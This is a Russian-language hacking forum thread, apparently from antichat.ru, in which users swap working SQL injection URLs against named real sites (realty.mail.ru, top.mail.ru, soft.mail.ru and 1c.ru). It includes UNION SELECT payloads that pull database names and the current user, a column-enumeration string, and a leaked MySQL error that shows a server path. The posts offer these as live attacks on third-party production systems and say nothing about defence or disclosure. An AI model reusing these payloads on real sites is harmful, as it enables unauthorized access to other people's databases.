|
Тема: Sql иньекция на Mail.ru!
|
или уш вот -) http://realty.mail.ru/main/sale/id_1'www.antichat.ru-FOREVA'/results.aspx
|
лень создавать тему и в топку -) http://www.1c.ru/partwebs/partwebs.jsp?city=www.antichat.ru'%20union%20selec t%20DB_NAME(1),CURRENT_USER--
|
Щас проверим :(
РАБОТАЕТ не так ссылку написал :( http://www.1c.ru/partwebs/partwebs.jsp?city=antichat.ru'%20union%20select%20 DB_NAME(0),CURRENT_USER-- Вот работает http://realty.mail.ru/main/sale/id_1'/results.aspx после id_1 НАДО чтоб он написал ' а он не пишет |
вот нашел еще одну sql иньекцию в mail.ru
http://top.mail.ru/stat?url=www.orel.ru'%20UNION%20SELECT%20*%20FROM% 20pages/* |
SQL-INJECTION на soft.mail.ru.
Уязвимость в cookies на страницах: Код:
index.php, interview_list.php, search_result_header.php, softclub-main.php.Ошибка: Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/test.allsoft.ru/aux/bokovik/opinion.inc on line 84 |
А что линк убрал?
|
Цитата:
Цитата:
|
статью мою почитай
|
http://top.mail.ru/stat?url=999%27+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15/*
|
| Время: 23:15 |